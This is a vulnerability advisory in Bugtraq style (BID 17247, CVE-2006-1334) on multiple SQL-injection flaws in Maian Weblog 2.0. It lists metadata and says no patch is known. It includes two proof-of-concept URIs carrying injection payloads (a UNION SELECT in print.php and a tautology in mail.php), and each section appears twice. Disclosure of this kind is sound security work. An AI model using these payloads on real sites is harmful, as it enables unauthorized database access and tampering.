Maian Weblog Multiple SQL-Injection Vulnerabilities
BID:17247
Info
Maian Weblog Multiple SQL-Injection Vulnerabilities
| Bugtraq ID: | 17247 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-1334 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 27 2006 12:00AM |
| Updated: | Mar 27 2006 10:54PM |
| Credit: | Aliaksandr Hartsuyeu is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Maian Script World Maian Weblog 2.0 |
| Not Vulnerable: | |
Discussion
Maian Weblog Multiple SQL-Injection Vulnerabilities
Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries.
This will allow an attacker to inject arbitrary SQL logic into the vulnerable parameters and scripts. As a result, the attacker may be able to access or modify sensitive information, compromise the application, or even compromise the underlying database. Other attacks are possible.
Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries.
This will allow an attacker to inject arbitrary SQL logic into the vulnerable parameters and scripts. As a result, the attacker may be able to access or modify sensitive information, compromise the application, or even compromise the underlying database. Other attacks are possible.
Exploit / POC
Maian Weblog Multiple SQL-Injection Vulnerabilities
This issue can be exploited through a web client.
The following example URIs are available:
http://www.example.com/print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6/*
http://www.example.com/mail.php? cmd=remove&email=111' or 1/*
This issue can be exploited through a web client.
The following example URIs are available:
http://www.example.com/print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6/*
http://www.example.com/mail.php? cmd=remove&email=111' or 1/*
Solution / Fix
Maian Weblog Multiple SQL-Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Maian Weblog Multiple SQL-Injection Vulnerabilities
References:
References:
- Maian Support Web Site (Maian Script World)
- Maian Weblog Multiple SQL Injection Vulnerabilities (eVuln.com)
- [eVuln] Maian Weblog Multiple SQL Injection Vulnerabilities ([email protected])